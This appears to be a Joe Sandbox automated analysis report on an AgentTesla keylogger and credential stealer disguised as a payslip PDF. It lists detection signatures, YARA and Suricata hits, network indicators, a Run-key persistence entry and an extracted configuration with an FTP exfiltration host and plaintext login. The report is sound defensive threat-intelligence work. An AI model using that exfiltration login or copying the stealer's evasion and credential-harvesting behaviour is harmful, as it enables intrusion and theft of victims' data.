Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payslip_October_2024_pdf.exe

Overview

General Information

Sample name:Payslip_October_2024_pdf.exe
Analysis ID:1548311
MD5:0d4985c828f3f9f6974b1602c92ee962
SHA1:0f11a5deef40a3dec6cb8cb0cc6ae057bd56c2dd
SHA256:59cbe4e681c4371b18a5f6d457369560ce9e4f0eda5a39de1acab8b5bdf73bda
Tags:AgentTeslaexeuser-threatcat_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • sgxIb.exe (PID: 432 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
    • sgxIb.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
  • sgxIb.exe (PID: 6192 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
    • sgxIb.exe (PID: 2800 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 0D4985C828F3F9F6974B1602C92EE962)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  5.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 17 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Payslip_October_2024_pdf.exe, ProcessId: 528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T10:13:19.167320+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549717TCP
                    2024-11-04T10:13:58.256553+010020229301A Network Trojan was detected4.245.163.56443192.168.2.549929TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T10:13:19.381403+010020299271A Network Trojan was detected192.168.2.549716110.4.45.19721TCP
                    2024-11-04T10:13:27.924804+010020299271A Network Trojan was detected192.168.2.549745110.4.45.19721TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-04T10:13:20.357961+010028555421A Network Trojan was detected192.168.2.549722110.4.45.19761813TCP
                    2024-11-04T10:13:20.363581+010028555421A Network Trojan was detected192.168.2.549722110.4.45.19761813TCP
                    2024-11-04T10:13:28.852402+010028555421A Network Trojan was detected192.168.2.549766110.4.45.19764083TCP
                    2024-11-04T10:13:28.863602+010028555421A Network Trojan was detected192.168.2.549766110.4.45.19764083TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 34%
                    Multi AV Scanner detection for submitted file
                    Source: Payslip_October_2024_pdf.exeReversingLabs: Detection: 34%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Payslip_October_2024_pdf.exeJoe Sandbox ML: detected
                    Source: Payslip_October_2024_pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49739 version: TLS 1.2
                    Source: Payslip_October_2024_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: eopJ.pdb source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
                    Source: Binary string: eopJ.pdbSHA256 source: Payslip_October_2024_pdf.exe, sgxIb.exe.3.dr
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 4x nop then jmp 06D1B7C8h0_2_06D1B06B
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 0B3CB7C8h4_2_0B3CB06B

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49722 -> 110.4.45.197:61813
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49766 -> 110.4.45.197:64083
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49716 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49745 -> 110.4.45.197:21
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 110.4.45.197 ports 62073,63363,49933,62375,64015,65027,56294,58054,58497,57320,56137,52591,54378,50752,53227,53903,49628,65335,58781,64647,58161,61813,1,2,61927,50066,53852,53156,57499,60003,53855,53556,51512,53414,64083,49362,56946,21
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.5:49712 -> 110.4.45.197:53855
                    Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49717
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.5:49929
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.5:49709 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 50 allowed.220-Local time is now 17:13. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003468000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003257000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003291000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49739 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, SKTzxzsJw.cs.Net Code: _71ZRqC1D
                    Installs a global keyboard hook
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Payslip_October_2024_pdf.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Payslip_October_2024_pdf.exe
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_027442100_2_02744210
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_02746F900_2_02746F90
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_0274DBDC0_2_0274DBDC
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_054DD4700_2_054DD470
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_054DC1A30_2_054DC1A3
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_054DFB780_2_054DFB78
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D1CFC80_2_06D1CFC8
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D107980_2_06D10798
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D107890_2_06D10789
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D1859F0_2_06D1859F
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D185B00_2_06D185B0
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D195480_2_06D19548
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D195380_2_06D19538
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D173000_2_06D17300
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D16ED80_2_06D16ED8
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D10A170_2_06D10A17
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D10A280_2_06D10A28
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 0_2_06D189E80_2_06D189E8
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_010941983_2_01094198
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_0109E9F83_2_0109E9F8
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_01094A683_2_01094A68
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_0109AD903_2_0109AD90
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_01093E503_2_01093E50
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_06847E903_2_06847E90
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068456A83_2_068456A8
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068467003_2_06846700
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_0684B3423_2_0684B342
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068435783_2_06843578
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_0684E7883_2_0684E788
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068477B03_2_068477B0
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068427103_2_06842710
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_068400403_2_06840040
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_06845DF73_2_06845DF7
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeCode function: 3_2_0684003E3_2_0684003E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_016742104_2_01674210
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_01676F904_2_01676F90
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0167DBDC4_2_0167DBDC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3CCFC84_2_0B3CCFC8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C0A284_2_0B3C0A28
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C0A174_2_0B3C0A17
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C89E84_2_0B3C89E8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C6ED84_2_0B3C6ED8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C73004_2_0B3C7300
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C83404_2_0B3C8340
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C07984_2_0B3C0798
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C07894_2_0B3C0789
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C95384_2_0B3C9538
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C95484_2_0B3C9548
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C85B04_2_0B3C85B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4_2_0B3C859F4_2_0B3C859F
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CE4A685_2_02CE4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CEE8D85_2_02CEE8D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CE3E505_2_02CE3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02CE41985_2_02CE4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD56B05_2_06BD56B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD67085_2_06BD6708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD35805_2_06BD3580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD7E985_2_06BD7E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD77B85_2_06BD77B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BDE4D05_2_06BDE4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD00405_2_06BD0040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD5DFF5_2_06BD5DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06BD00065_2_06BD0006
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_030242107_2_03024210
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_03026F907_2_03026F90
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_0302DBDC7_2_0302DBDC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_056D02A07_2_056D02A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_056D02907_2_056D0290
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_013CA4B08_2_013CA4B0
